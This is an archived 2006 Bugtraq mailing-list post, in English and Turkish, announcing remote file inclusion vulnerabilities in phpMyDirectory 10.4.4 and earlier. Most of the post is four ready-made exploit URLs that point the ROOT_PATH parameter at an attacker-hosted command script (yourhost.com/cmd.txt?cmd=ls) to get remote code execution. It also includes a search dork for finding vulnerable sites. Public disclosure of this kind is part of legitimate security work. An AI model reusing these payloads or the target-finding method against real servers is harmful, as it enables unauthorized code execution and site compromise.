[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060522183505.29920.qmail@securityfocus.com>
Date: 22 May 2006 18:35:05 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)
ENGLISH
# Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Dork : "powered by phpmydirectory"
# Author : ajann
# greetz : Nukedx,TheHacker
# Exploit;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
# ajann,Turkey
TURKISH
# Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Açığı Bulan : ajann
# greetz : Nukedx,TheHacker
# Açık bulunan dosyalar;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.
Thanks.
Powered by blists - more mailing lists